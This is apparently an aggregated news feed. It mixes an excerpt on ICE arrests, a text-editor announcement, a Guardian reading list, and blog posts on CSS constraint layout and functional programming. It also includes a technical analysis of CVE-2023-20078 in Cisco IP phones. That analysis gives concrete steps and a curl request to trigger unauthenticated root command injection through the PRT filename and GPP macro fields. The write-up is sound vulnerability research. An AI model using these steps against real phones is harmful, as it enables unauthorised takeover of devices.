“I can’t think of a time in recent U.S. history that a sitting U.S. president has called the people from an entire country ‘garbage,’” Chan said. “Even where there is a historical precedent, it’s one that we thought we were beyond.”

Twelve Arrests?

It’s unclear how many arrests have been made so far. ICE and its parent agency, the Department of Homeland Security, have refused to give specifics.

In one press release on Thursday, however, Homeland Security officials said that at least 12 people had been arrested so far. As with other recent immigration sweeps across the country, Homeland Security labeled the detainees as the “worst of the worst,” saying the arrestees included people with convictions for sexual assault of a minor.

Many, however, had minor criminal infractions, including driving while intoxicated. And others still had checkered pasts that they had long since made amends for.

Among the detainees picked up this week by ICE was Abdulkadir Sharif Abdi, whom the agency described in a press release as a gang member.

Abdi’s wife, Rhoda Christenson, told The Intercept that she was driving to pick up a prescription for her mother on Monday when she received a call from a neighbor telling her that Abdi had been arrested by ICE.

Christenson acknowledged her husband’s criminal past — which led to a deportation order during the first Trump administration — and his struggles with addiction, but said he’s been sober for more than 15 years. He now works at a homeless shelter and has become a staple of the local recovery community.

“He’s such a light in the community,” Christenson said in an interview Friday morning. “He has so much to offer and shows so much love and respect for the homeless population he works with.”

Christenson was sent reeling again Thursday when she saw the allegations from Homeland Security that her husband was an active gang member, something she categorically denied.

“How can they just lie like that?” she asked. “I know social media is crazy, but a government website is something we have to be able to rely on for accurate information. It’s really disheartening and it makes me worried for how they will treat him.”

Flow Control: a programmer's text editor

Lobsters
flow-control.dev
2025-12-06 09:42:13
Comments...
Original Article

a programmer’s text editor

Flow Control is under active development, but very stable.

🚀 Features

  • Lightning Fast TUI with ≤6ms frame times, low latency input handling and smooth animated scrolling
  • Intuitive UI with tabs , scrollbars and palettes with full mouse support for all UI elements
  • Support for more than 70 programming languages , zero configuration needed, via tree-sitter powered syntax highlighting
  • Preconfigured Language Server Protocol support for most language servers
  • Powerful multi-cursor editing and integrated clipboard history
  • Powerful configurable keybinding system that supports modal and non-modal editing styles
  • Multiple pre-configured keybinding modes
    • Flow Control - GUI IDE style bindings (similar to vscode)
    • Emacs
    • Vim
    • Helix
    • User created
  • Hybrid rope/piece-table buffer system, edit very large files with thousands of cursors
  • Infinite undo (at least until you run out of RAM)
  • Full unicode support, including support for the kitty text sizing protocol
  • Plenty of themes included and support for vscode themes via the flow-themes project
  • Runs on Linux, FreeBSD, macOS, Windows and Android (under Termux) with easy cross-compilation to all supported targets

Requirements

  • A modern terminal with 24-bit color and, ideally, kitty keyboard protocol support. Kitty, Foot and Ghostty are the recommended terminals at this time. Zellij also works well. Most other terminals will work, but likely with reduced functionality.
  • NerdFont support. Either via terminal font fallback or a patched font.
  • A UTF-8 locale

🛣️ Roadmap

See our devlog for on-going updates from the development team.

In Development

  • LSP completion support
  • Persistent undo/redo
  • File watcher integration

Future

  • Collaborative editing
  • Plugin system
  • Multi-terminal sessions

CVE-2023-20078 technical analysis: Identifying and triggering a command injection vulnerability in Cisco IP phones

Lobsters
www.ibm.com
2025-12-06 06:10:26
Comments...
Original Article

CVE-2023-20078 catalogs an unauthenticated command injection vulnerability in the web-based management interface of Cisco 6800, 7800, and 8800 Series IP Phones with Multiplatform Firmware installed; however, limited technical analysis is publicly available. This article presents my findings while researching this vulnerability. In the end, the reader should be equipped with the information necessary to understand and trigger this vulnerability.

Vulnerability details

The following Cisco Security Advisory ( Cisco IP Phone 6800, 7800, and 8800 Series Web UI Vulnerabilities – Cisco ) details CVE-2023-20078 and CVE-2023-20079. This vulnerability affects Cisco 6800, 7800 and 8800 Series IP Phones with Multiplatform Firmware Release earlier than 11.3.7SR1. The details section for CVE-2023-20078 describes the vulnerability as: “A vulnerability in the web-based management interface of Cisco IP Phone 6800, 7800 and 8800 Series Multiplatform Phones could allow an unauthenticated, remote attacker to inject arbitrary commands that are executed with root privileges.” Like many vulnerability disclosures, information concerning triggering the vulnerability is limited to: “This vulnerability is due to insufficient validation of user-supplied input. An attacker could exploit this vulnerability by sending a crafted request to the web-based management interface. A successful exploit could allow the attacker to execute arbitrary commands on the underlying operating system of an affected device.” Cisco assigned the Bug Number: CSCwc78400 for this vulnerability. CVE-2023-20078 is assigned a CVSS Base Score of 9.8.


Official fix

The previously mentioned Cisco Security Advisory explicitly states Cisco has released software updates that address CVE-2023-20078 and CVE-2023-20079 and that there are no workarounds available. Cisco specifically addresses these vulnerabilities in a follow-on firmware: Firmware Version 11.3(7)SR1.

Testing hardware

Testing was conducted on a Cisco IP Phone 6841 with Multiplatform Firmware version 11.3.7 installed. I managed to secure an unboxed phone from eBay on the cheap. You may find a datasheet on this device here: ( Cisco IP Phone 6800 Series with Multiplatform Phone Firmware Data Sheet – Cisco ).

What is multiplatform firmware?

An important detail regarding this vulnerability is it’s limited to Cisco 6800, 7800 and 8800 Series IP Phones which are running a vulnerable release of Cisco Multiplatform Firmware. Knowing little about IP Phones and the Cisco product line, this detail raises the question, “What is Multiplatform Firmware?”. Cisco describes Multiplatform Firmware (MPP) stating “The MPP line is designed for Webex Calling and compatible with third-party platforms, allowing you to deploy it your way.” ( Cisco IP Phones with Multiplatform Firmware (MPP) – Cisco ). Based upon this description, it appears MPP provides hardware support for an alternative to the IP call agent you may be familiar with: Cisco Unified Communications Manager (CUCM).

Release notes analysis

The following link ( Cisco IP Phone 6800 Series Multiplatform Phones Release Notes for Firmware Release 11.3(7)SR1 – Cisco ) includes release notes for the patched firmware. This Release Notes document includes a resolved-bugs table, which lists the bug number for CVE-2023-20078, CSCwc78400. Its description provides useful information for narrowing our focus on where the vulnerability may lie in the firmware: “Command injection during PRT file generation”. The Release Notes also provide additional detail in the “Changes in this release” section. The “PRT (Problem Report Tool) file name restrictions” section supports our suspicion that the command injection vulnerability lies somewhere in this PRT file generation function. The sentence describing the restrictions includes a juicy detail that we’ll come back to later in this article: “This firmware does not allow the use of “.” character in PRT name either used directly or included as a part of the macro variable”. All of this should increase our confidence about where this vulnerability lies: somewhere in a function related to PRT file generation.

What is a PRT file?

The following document ( Report Phone Issues on the Cisco IP Phone 8800 Series Multiplatform Phone – Cisco ) describes what a Problem Reporting Tool (PRT) file is and provides excellent documentation on how to generate and collect one: “The Problem Reporting Tool (PRT) on the Cisco 8800 Series IP Phone allows you to collect and send phone logs to your administrator. These logs are necessary for troubleshooting in case you run into phone issues”. This document will prove extremely useful in understanding how to trigger PRT file generation, as well as possible input sinks for the command injection vulnerability. Let’s remember these for later.

Figure 1 – Three Possible Input Sinks for the Command Injection Vulnerability

Figure 2 – An Example of a PRT File Ready for Download

Firmware analysis – Obtaining the vulnerable web management binary

The latest vulnerable firmware is available for download at Software Download – Cisco Systems . Utilizing the open source project binwalk ( GitHub – ReFirmLabs/binwalk: Firmware Analysis Tool ), I successfully extracted the root filesystem, encapsulated in the rootfs2.68xx.11-3-7MPP0001-272.sbn binary file.

Figure 3 – 68XX Root File System

With enough GREP-fu, it is possible to identify the binary which ultimately serves the Web Management User Interface containing the vulnerability: /usr/mbin/spr_voip. However, I later discovered that the easiest way to find this binary was to look at a PRT file. After generating a valid PRT file and inspecting the “show-output-{DATE}-{TIME}.log” file (for example, “show-output-20240115-142558.log”), you can see what appears to be netstat output (Figure 4), which shows the spr_voip binary listening on TCP port 80. Bingo! Let’s analyze this binary.

Figure 4 – spr_voip Binary Listening on Port 80
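If you want to reproduce the extraction and search steps, they look roughly like the following. This is a minimal sketch: binwalk's -e flag performs extraction, the _*.extracted output directory is binwalk's default naming convention, and the exact paths inside the extracted tree may vary between binwalk versions.

# Carve and extract the root filesystem from the firmware image.
binwalk -e rootfs2.68xx.11-3-7MPP0001-272.sbn

# Locate the web management binary inside the extracted tree.
find _rootfs2.68xx.11-3-7MPP0001-272.sbn.extracted -name spr_voip

# Confirm which binaries reference PRT generation strings
# (grep prints "Binary file ... matches" for binary hits).
grep -r genprt _rootfs2.68xx.11-3-7MPP0001-272.sbn.extracted 2>/dev/null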

Binary analysis – Investigating spr_voip

Generating our own legitimate PRT file and intercepting the request with a proxy, we can identify that “/genprt” is the web route responsible for handling PRT file generation requests. We also get a better understanding of the expected request and response body messages:

Request:

POST /genprt HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://192.168.86.33/
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: 192.168.86.33
Content-Length: 362
Pragma: no-cache
Connection: close

2012-01-15&13:55:29&Other


Response:

HTTP/1.1 200 OK
Date: Mon, 15 Jan 2024 21:02:21 GMT
Last-Modified: Mon, 15 Jan 2024 21:02:21 GMT
Etag: 65a59d5d.6b
Content-Type: application/json
Content-Length: 107
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
Content-Security-Policy: frame-ancestors none
Strict-Transport-Security: max-age=31536000; includeSubDomains
Connection: close
Accept-Ranges: bytes

{
    "url": "",
    "status": "0",
    "uploadStatus": "3",
    "prtfile": "prt-20240115-150203-0CD0F8F52A36.tar.gz"
}


With our “/genprt” knowledge in hand, let’s import spr_voip into Ghidra and find where the command injection vulnerability lies. Using the String Search feature in CodeBrowser, we can search for the string “genprt” and view the results.

Figure 5 – /genprt String in spr_voip Binary

At location 003e2168 we see the object DAT_003e2168. If we view references to DAT_003e2168, we see only one reference at 001c4368:

Figure 6 – References to /genprt String in spr_voip

Address 001c4368 is part of a larger function that serves as spr_voip’s request handler (identified as UndefinedFunction_001cf338 in Figure 7). Looking at the decompiled code, we see that the function “handl_prt_gen” is called if the request is destined for “/genprt”.

Figure 7 – spr_voip Request Handler

Observing the decompiled output for handl_prt_gen, we can see the gen_prt_file function being called:

Figure 8 – handl_prt_gen Function

The gen_prt_file function is where the excitement is. Starting at line 91, we see a PRT file name string being created and passed into larger strings, which appear to build a command (line 99 or line 102). This string is then passed to exec_prt_cmd (line 100 or 103). We’ve identified two possible input sinks (/usr/bin/genprt_infra and /usr/bin/genprt.sh), and the command injection alarms are sounding! After analyzing both, genprt.sh is where we should focus our attention.

Figure 9 – Possible Input Sink for Command Injection

Our input sink – genprt.sh

Viewing genprt.sh, the comment at the top of the file, “Script used to generate prt file”, tells us we are getting closer.

Figure 10 – genprt.sh Script

We also see where our input sink is used in the script, captured as $filename:

if [ -z $1 ] ; then
    ext=$(date ...)    # exact date format string truncated in this capture
    filename="prt-$ext.tar.gz"
else
    filename=$1
fi
logit "prt filename $filename"


At the bottom of the script, we see where our input sink, $filename, is used to compress a directory containing all of the files destined for the PRT tar.gz archive. There is our command injection!

Figure 11 – genprt Command Injection Vulnerability

If we recall the response body for a legitimate PRT file generation request, the PRT file had a filename like “prtfile”: “prt-20240115-150203-0CD0F8F52A36.tar.gz”, where 0CD0F8F52A36 is the MAC address of the device. This filename matches the naming convention found in the true branch of the if statement: filename="prt-$ext.tar.gz". The question is: how can we ensure our input is passed to the $filename variable (the filename=$1 branch)?

Release notes: Remember “macro variable”?

After tedious levels of static analysis on spr_voip, I reviewed the Release Notes once more. The statement “This firmware does not allow the use of “.” character in PRT name either used directly or included as a part of the macro variable.” caught my eye again.

What is a macro variable?

Buried deep within the following document ( Cisco IP Phone 8800 Series Multiplatform Phone Administration Guide for Release 11.3(1) and Later – Phone Features and Setup [Cisco IP Phone 8800 Series with Multiplatform Firmware] – Cisco ), Macro Variables are described: “You can use macro variables in XML URLs. The following macro variables are supported:…”. The Macro Variables GPP_A through GPP_P caught my attention. The document describes these macros as “general-purpose parameters”.

Investigating the Web Interface for the device, I discovered that the GPP Macros may be set under /admin/advanced -> Voice -> Provisioning Tabs. By default, the admin routes are not password protected.

Second, I observed the PRT Name: field. After reading the documentation further and testing, I discovered that a GPP macro can be referenced in this field with the $ syntax (for example, $A for GPP A). By setting the GPP A: parameter to “;{command};”, setting the PRT Name: to “prt-$A”, and then generating a new PRT file, I can successfully achieve command injection!

Figure 12 – Setting GPP Macros for Command Injection

Figure 13 – Triggering PRT File Generation Once More

Figure 14 – Confirming Command Injection
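To recap the trigger end to end, here is a minimal reproduction sketch based on the requests captured earlier. The IP address is my lab device, {command} stands in for your payload (set beforehand in the GPP A: provisioning field), and the PRT Name: field is assumed to already contain prt-$A:

# Trigger PRT file generation, which runs genprt.sh with the attacker-controlled name
curl -X POST 'http://192.168.86.33/genprt' \
  -H 'Content-Type: application/x-www-form-urlencoded' \
  --data '2012-01-15&13:55:29&Other'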

Conclusion

At first glance, CVE-2023-20078 provides little of the information necessary for exploitation. However, by combining Cisco Security Advisories, Release Notes and product documentation with firmware analysis, it is possible to work out how to trigger the vulnerability. With this knowledge in hand, there are multiple avenues for acquiring a shell on the device; however, I will leave that as a challenge to the reader.

Six great reads: a train ride to the future; searching for the ‘sky boys’ and wallaby hunting in the English countryside

Guardian
www.theguardian.com
2025-12-06 06:00:46
Need something brilliant to read this weekend? Here are six of our favourite pieces from the last seven days Continue reading......
Original Article

  1. ‘It’s going much too fast’: the inside story of the race to create the ultimate AI

    Composite: Getty/Guardian Design Team

    In Silicon Valley, rival companies are spending trillions of dollars to reach a goal that could change humanity – or potentially destroy it. Robert Booth caught a morning train through the San Francisco outskirts to speak to those working at the cutting edge of this multi-trillion-dollar revolution, where some people worry that the push for AI is “all gas, no breaks”.

    Read more


  2. ‘It was extremely pornographic’: Cara Hunter on the deepfake video that nearly ended her political career

    Cara Hunter. Photograph: Polly Garnett/The Guardian

    The Irish politician was targeted in 2022, in the final weeks of her run for office. She has never found out who made the malicious deepfake, but knew immediately she had to try to stop this happening to other women. Anna Moore spoke to her for the first part of this powerful new series about the rise of deepfakes and their impact on the women affected by them.

    Read more


  3. ‘It would take 11 seconds to hit the ground’: the roughneck daredevils who built the Empire State Building

    A construction worker connects two cables suspended high above New York during the construction of the Empire State Building. Photograph: Lewis W Hine

    They are some of the most famous images of the world’s most famous building. But who were the men in them? Catherine Slessor spoke to the author Glenn Kurtz , who has made it his mission to identify men like “The Sky Boy” who built the Empire State Building, and were captured in the photographs of Lewis W Hine.

    Unlikely to be as historically beloved as the Empire State is its new midtown neighbour, the new HQ of JP Morgan on Park Avenue, which boasts unusually tall floors and an interior wind machine to flutter the stars-and-stripes flag in the lobby. Our architecture critic Oliver Wainwright reports on this “eco obscenity” .

    Read more


  4. ‘It moved … it was hopping!’ One man’s search for a wild wallaby in the UK

    Sam Wollaston prepares to go wallaby hunting in Oxhill, Warwickshire. Photograph: Fabio De Paola/The Guardian

    Reports of escaped wallabies are on the rise in Britain, especially in southern England. But how easy is it to spot these strange and charismatic marsupials – and why would a quintessentially Australian creature settle here? Sam Wollaston donned his binoculars to see if he could spot one. And guess what …

    Read more


  5. ‘I wish I could say I kept my cool’: my maddening experience with the NHS wheelchair service

    Paul Sagar at his home in London. Photograph: Antonio Zazueta Olmos/The Guardian

    Last year, Paul Sagar wrote a harrowing account of becoming paralysed in a climbing accident . For the Long Read this week he chronicled his struggles with England’s wheelchair services: “I did not yet know that local wheelchair services are a lottery, in which some of the most vulnerable people in society roll the dice. A lottery in which the taxpayer acts as permanent lender of last resort – while private companies profit.”

    Read more


  6. ‘The Mamdani effect’: wealthy New Yorkers show renewed interest in Miami’s Billionaire’s Beach

    Motorists cruise along Collins Avenue Photograph: Scott McIntyre/The Guardian

    A stretch of prime waterfront real estate in Miami, home to a mix of famous old art deco hotels such as the Delano and Raleigh, is where realtors and developers are beginning to see the first shoots of what they call the “Mamdani effect”: the predicted exodus of wealthy New Yorkers in the wake of democratic socialist Zohran Mamdani’s election as mayor. Richard Luscombe spoke to the real estate executives who are primed to cash in.

    Read more

Should CSS be Constraints?

Lobsters
pavpanchekha.com
2025-12-06 04:17:31
Comments...
Original Article

CSS is hard. The layout rules are quite complex and hard to pick up just from examples. Something like "centering a <div> " is, like, famously a problem. Or remember the 2000s when you'd read A List Apart for all sorts of crazy ways to achieve the "Holy Grail" layout, specifically a header, a main body and sidebar of equal heights, and a footer? Given that it's such a mess, should we maybe just throw it out and start over with a totally different system?

I do feel like I can speak on this with some authority. In grad school I wrote the first formal specification of the CSS 2.2 spec; the formal spec passed (the relevant fragment of) the conformance tests. So I know the existing algorithm in quite a lot of detail, though of course I'm going beyond that expertise when I talk about what designers do or about other systems.

Constraints

One commonly-proposed replacement for CSS is a constraint system. In a constraint system you can just directly say:

(obj.top + obj.bottom) / 2 ==  (obj.parent.top + obj.parent.bottom) / 2

This line constrains the vertical midpoint of obj to be the vertical midpoint of its parent; in other words, it constrains it to be vertically centered.

And in fact this idea has been explored quite a bit. In CSS, there's the well-known Constraint cascading style sheets paper. The idea in that paper is that the web page author writes constraints , somewhat like the one above, and then the browser runs a constraint solver which computes positions and sizes for each object that satisfy the constraints. This is much like normal CSS, where the web page author writes rules and then the browser runs a layout algorithm that computes sizes and positions. 1 Naturally in both cases you actually compute a lot more than just sizes and positions: fonts, colors, and so on. But layout is taken to be the "hard part" of the problem, and I don't really disagree with that.

In fact the authors (especially Alan Borning ) have a long history with constraint solvers, and in particular are associated with the Cassowary incremental constraint solver, where "incremental" means it can not only solve the constraints quickly but also re-solve them extra-quickly when the page changes a small amount, as in response to JavaScript or user action. Real browsers do that too . And they've been quite successful. Most notably, iOS provides constraint-based layout using a re-implementation of Cassowary, and I hear it's quite popular.

What's wrong with constraints

All that said, I don't think a constraint system would actually be better for the web. With rule-based systems like current CSS, the challenge is that the rules are really complex and it's hard to predict what the layout will be, because actually executing the rules in your head is nearly impossible. But with constraint-based systems, the layout might be literally under- or over-determined, in the sense that there might be several layouts, or none at all, that satisfy your rules.

In fact, writing layout constraints for UIs that aren't either under- or over-determined is basically impossible and I'm not sure anyone has ever done it. Even the simple "vertical centering" constraint above doesn't fix the size or position of either box. It doesn't say that the outer box ( obj.parent ) should be the minimum possible size to contain its child ( obj ), or that they should both be onscreen, or whatever. Maybe you'd write other constraints to achieve that, but the more constraints you write, the greater the chance those constraints will conflict, leaving you over-determined.
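To see this concretely, here is a minimal sketch using Python's kiwisolver package (a Cassowary-derived solver, standing in for the systems discussed above, not the paper's own implementation). Pinning the parent and adding only the centering constraint leaves the child's edges free, so the solver just picks one of infinitely many valid answers:

from kiwisolver import Solver, Variable

top, bottom = Variable("obj.top"), Variable("obj.bottom")
ptop, pbottom = Variable("parent.top"), Variable("parent.bottom")

solver = Solver()
solver.addConstraint(ptop == 0)       # pin the parent...
solver.addConstraint(pbottom == 100)  # ...to a fixed 100px extent
# The "vertically centered" constraint from above:
solver.addConstraint((top + bottom) / 2 == (ptop + pbottom) / 2)
solver.updateVariables()

# Some solution satisfying the constraint -- but which one is the solver's choice.
print(top.value(), bottom.value())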

There's a bunch of things you could do at this point. For under-determined layouts, you could add "implicit rules", like saying that boxes should always be onscreen. Or "optimization criteria", like saying that if multiple layouts are available you should pick the one that takes up the least space. And for over-determined layouts, you could do the reverse, like assigning "weights" to each constraint and then optimizing for breaking the fewest. This isn't a crazy way to build a system—it's basically how LaTeX works—but fiddling with the weights, the exact form of the implicit rules, and the optimization criteria becomes, in practice, the actual determiner of how layouts look. And it turns out that simple implicit rules / criteria / weights lead to bizarre, horrible edge cases, so if you want things to look good you'll need really complicated ones, and then you're back to the actual layout being hard to predict from the style sheet.

In fact, LaTeX is not widely beloved for its predictable layout. And while constraint layout is, I believe, popular on iOS, it's notable that iOS quite famously allows only a small number of screen / window shapes. And people still complain about the constraint-based layout being fussy, brittle, and unpredictable, with debugging (especially debugging under- and over-constrained layouts) considered tedious and annoying. Plus, people say it's verbose; given that there actually are conventions and patterns to how people design UIs, it would be nice to actually express those patterns and be modular with regard to them, and constraint-based systems, especially once you start adding implicit rules or optimization criteria, are quite explicitly not modular.

I do applaud Apple for shipping and I'm happy people are using it and it solves their problems. LaTeX solves mine! 2 Newer students seem really excited about Typst , which I have not tried yet. But I do think designers in constraint-based systems suffer exactly the kinds of problems theory would predict.

What's the underlying problem?

So why is this so hard? Why do all these weird edge cases pop up whenever we do layout? I think the issue is that layout actually is quite hard.

Here, let me give you an example. Here's a line from my formal semantics of CSS 2.2, the specification of text-align: center :

[(is-text-align/center textalign)
 (= (- (left-outer f) (left-content b)) (- (right-content b) (right-outer l)))]

This is saying that if a container b has text-align: center specified, then its left gap (the x position of the left outer edge of its first child f , minus the left content edge of the container b ) equals its right gap (similar, using right edges, the last child l , and the subtraction reversed). It's a constraint! But then if you go a few lines up you'll see that before actually applying this constraint, we first check whether the container is even big enough to contain the content, and if not, we left-align it no matter what.

What? Really? Yep. It's a tricky little quirk of the CSS semantics, section 9.4.2 of CSS 2.1. 3 Actually, I think the controlling standard on this exact quirk is now CSS Text Level 3 which has a quite clear paragraph documenting this behavior. If text is centered inside a box too small to contain it, we don't want it spilling out the left edge (it might go off-screen, where the user cannot scroll); left-aligning ensures it only spills out on the right.

That's a funky quirk but also, you may have never noticed it and if you did this edge case probably was better than what the layout would have been. Meaning, actually, building this edge case into the definition of text-align was a smart choice by the CSS designers, embedding hard-earned design wisdom into intuitive rules that people mostly use without issue. ( text-align is not considered one of the bad scary parts of CSS.) And on the contrary, in a "clean" constraint-based system, web page designers would probably not bothered to manually add this as a constraint, and probably in quite a few cases that would result in worse, not better layout.

Generalizing a bit, the challenge is that we're never just "deciding what our page looks like". We are always designing a layout that is responsive to parameters like screen size, zoom level, details of font rendering (Windows and macOS render identical fonts slightly differently), operating system details, and even higher-level changes in our application like new content, new features, translations to other languages, 4 device oddities like notches, and so on. 4 German words are very long, Chinese ones are very short.

Designing a layout from scratch that looks good in any possible one of those contexts is basically impossible—it's hard enough to do both desktop and mobile!—and so designers are, by necessity, going to rely on implicit knowledge encoded somewhere on what to do in edge cases. There's going to be a huge amount of this implicit knowledge, and whether it's encoded in rules or weights or optimization criteria it's going to be opaque to designers and surprising at least sometimes.

For example, in CSS you can also justify text, stretching spaces between words so that all lines in a paragraph (except the last!) have the same right edge. But, famously, if the line width is too narrow and the line contains too few words that are too long, then the spaces between them get stretched comically far apart and it looks terrible. You can do better by enabling hyphenation (which might turn 2 really long words in a line into 3 or more moderate size word chunks) or letter-spacing (which might also stretch the spaces between letters slightly) but those are themselves unpredictable and language-dependent and still sometimes look ugly.

So where did all these implicit rules about justification come from? Well, text justification comes from a long Western tradition . 5 That post claims Trajan's column, built 113 AD, as an early example. So what happened in that long Western tradition, before CSS and computers, when this problem came up? Well, in the olden days, if you were a newspaper columnist and your column was ugly when justified 6 ( 6 Most newspapers justified their text and also ran it in lots of narrow columns, so it was especially a problem for newspapers.), then your editor might just rephrase your text into smaller words. That technology might slowly be becoming possible but is clearly outside the bounds of what CSS would do. Generalizing, these implicit rules often draw from traditions where these edge cases simply never came up! So it's no surprise that there might be no workable set of implicit rules with no edge cases.

So what can we do instead?

I think what we can do, though, rather than trying a ground-up re-conception of the problem, is to improve the situation by providing more intuitive rule systems with more predictable, less esoteric rules. For example, when designing CSS layouts, you can use negative margins and floats and clear: both , like we did in the A List Apart days. Or you can use flex-box and grid . Both are workable, but you can guess which of these I teach to students!

To analogize a bit… JavaScript has all sorts of bizarre mis-behaviors and semantic oddities, like for ... in loops or the with statement or eval's totally insane semantics and syntax. 7 Look for "Direct and indirect eval"; eval(<expr>) is a special syntactic form separate from function application, but there's also a function named eval that can be applied with normal function application, and they behave differently. One solution to this problem is to forsake JavaScript forever, to use Lisp or Haskell or Rust or something. But another is, like, TypeScript and ESLint, which together make it really easy to avoid all the bad features of JavaScript and use good versions instead. C has a similar situation, where strcpy has really simple but also bad semantics. One option is forsaking C and rewriting in Rust. Another is using strlcpy .

In CSS specifically, a lot of the problems in CSS layout are, more precisely, problems in "flow layout", the default layout mode, which is optimized around laying out text in a standard Western style. What's fine for text isn't good for applications, and doing UI design using text-formatting tools like floats and clear was never going to be simple and intuitive. By contrast, newer layout modes like flex-box and grid are maybe a bit more complex off the bat, but once you grasp the mental model they are quite intuitive, with far fewer sharp edges.
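For instance, the famously hard "centering a <div>" problem from the top of this post becomes, in flex-box, just a couple of declarations on the parent (a standard snippet, nothing exotic):

.parent {
  display: flex;
  justify-content: center; /* horizontal centering */
  align-items: center;     /* vertical centering */
}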

So I think in fact the solution is what the CSS committee has been doing, standardizing new and more intuitive layout modes optimized for the specific types of layouts being poorly served by what currently exists. With just a bit of effort, those new layout modes can be intuitive, with few edge cases, while still building in a lot of implicit knowledge around, for example, how to respond to container size changes or handle content that is too big or too small.

Thanks to my PhD student Andrew Riachi , whose work on his own website inspired this blog post.

What's the Point of Learning Functional Programming?

Lobsters
blog.daniel-beskin.com
2025-12-06 03:56:35
Comments...
Original Article

"What's the point of learning functional programming?" was a genuine question I got from a student on a functional programming course I was TAing on.

But let's rewind for a bit of background first. As I found myself standing in front of a frightened looking class, reviewing some Haskell basics, I was starting to feel guilty 1 for overwhelming them with all these foreign new concepts. Recursion, currying, function composition, algebraic data types, and the list goes on and on. So it felt natural to give them an escape hatch.

I mean, if all you know in life are loops, how can you possibly make do with just recursion? So when it was time for a new homework assignment we gave them a hint along the following lines:

Try solving with Pythonish pseudocode first, and every time you have a loop, you can convert it to a tail recursive function as follows...

Proceeding to explain how to convert loops to tail recursion 2 . At that, some of the students seemed mildly relieved, and continued with their homework.

Fast forward to after the submissions. A student approached me after class with a question. I was surprised; until then I had scarcely seen them outside their Haskell stupor. And here's what the student had to say: "If all we did was write some Python in Haskell syntax, what's the point of learning functional programming?"

Thinking about it, he was right. With the escape hatch we gave them they really could solve the homework by mechanically translating Python code into Haskell. Apart from some new syntax, you're not really learning much of anything new. And that's unfortunate, there's so much to learn from Haskell and functional programming in general. It would be a shame to miss the opportunity.

Can we do better?

The Homework

The homework problem was to solve the knight's tour problem . That is, given a chess board of some arbitrary dimensions and a starting position, find a path that a knight can take that will go through all the cells of the board exactly once.

Efficiency was not the point of this exercise, so the students could just do a brute-force search for the correct path using backtracking. Suppose you're a student and Python is your main weapon of choice. How would you solve this?

Here's the core function of a very naive attempt at brute-forcing the solution 3 :

# 1
def tour(n, visited, moves, pos):
    if len(visited) == n * n:  # 2
        return moves
    for knight_move in all_moves:  # 3
        (row, col) = pos
        (dx, dy) = knight_move.value  # 4
        next_row = row + dx
        next_col = col + dy
        next_pos = (next_row, next_col)
        # 5
        if is_valid(n, visited, next_row, next_col):
            new_visited = visited + [next_pos]  # 6
            new_moves = moves + [knight_move]
            # 7
            result = tour(n, new_visited, new_moves, next_pos)
            # 8
            if result is not None:
                return result
    # 9
    return None

This is not very good code, for various reasons. But that's not really the point, it (slowly) solves the problem as stated, and that's good enough for illustration purposes. Let's review what this does:

  • tour is a recursive function (1) that takes the current state as input:
    • The size of the board n
    • The list of already visited coordinates
    • The moves we constructed so far
    • And a tuple of coordinates pos for the current position
  • We have a stopping condition (2), if the path we visited covered the whole board, in which case we are done and we return the moves that were constructed
  • If not, we iterate over all possible knight moves (3), which are defined as a separate enum
  • For each such move, we construct the next cell that we are going to visit (4)
  • If the new cell is valid (5), i.e., within the bounds of the board and wasn't visited before
  • We add the new position to the list of visited cells (6), and the current move to the moves we are building 4
  • We then proceed with the next step by recursively calling on tour with the new state (7)
  • If the result of the recursive call was successful we return that (8)
  • Otherwise, we backtrack on this attempt and try the next knight move in the list
  • When we exhausted all the possible knight moves, we give up and return None (9)

This is all good and well, but the actual homework is in Haskell. What good is it to have this Python solution instead?

A Haskell Rewrite

It is true that having a concrete (and correct ) solution written out is very helpful in thinking about a problem. But with the tip that we gave the students about loops and recursion, it's even better than that. It's actually fairly mechanical to translate the Python code into Haskell. To wit 5 :

tour n visited moves row col =
  if length visited == n * n
    then Just moves -- 1
    else go allMoves -- 2
  where
    -- 3
    go [] = Nothing
    go (knightMove : rest) =
      let (dx, dy) = moveValue knightMove
          nextRow = row + dx
          nextCol = col + dy
          nextPos = (nextRow, nextCol)
       in if isValid n visited nextRow nextCol
            then
              let newVisited = visited ++ [nextPos]
                  newMoves = moves ++ [knightMove]
                  result = tour n newVisited newMoves nextRow nextCol
                  -- 4
               in case result of
                    Just solution -> Just solution
                    Nothing -> go rest -- 5
            else go rest -- 6

If you're familiar with Haskell syntax, this code should look basically the same as the original Python code. There are a few differences, but they are mostly cosmetic:

  • Since there's no None (or null s in general) in Haskell, we have to wrap things with Maybe (1), it's a bit more syntax compared to Python, but not by much
  • Haskell is expression-oriented, so there are no early returns
  • As a consequence the stopping condition has an else (2) that invokes the logic for the next step
  • The main loop over knight moves was replaced by a tail recursive function called go (3), this is our tip in action
  • We need a bit more ceremony when working with Maybe , so we pattern match on it (4)
  • Since we are not running in a loop, we must call the next backtracking step explicitly by invoking go (5, 6) with a new argument

If you're a student who just created this Haskell solution from the Python sketch, what new things did you learn?

You might've learned that it's possible to work without nulls. But since this code is small, the consequences of not having null are not very visible, and you mostly get just some added syntactic noise 6 . And not having null is not a uniquely functional thing; Rust, for example, doesn't use null either.

There's a glimpse of being more expression-oriented here. That's a deep and very impactful principle. But since we just mechanically translated from Python, it's easy to miss its significance. This is even more obscured by the fact that it's difficult to appreciate the consequences of expression-orientedness "in the small".

Lastly, we learned that it's possible to replace iteration with simple recursion. Which is cool and all, but what's the point? for loops work well enough, doing recursion just for that feels like a lousy (and overly general) syntax for something we already have figured out.

If you submit this solution to the problem it won't be out of place to wonder "what's the point?".

Going Functional

Now you may be screaming at the screen that no, functional programming is worth learning, it's not just Python with uglier syntax. And you would be right, there is a lot to learn, even with a simple assignment such as the one we are working with now.

But to get these benefits we must make an effort to break away from our "mainstream" roots, and stop translating the old way into a new syntax. We need to completely change the way we think about the problem and its solution.

For problems like this knight's tour, one good approach is to use what is called "wholemeal programming" :

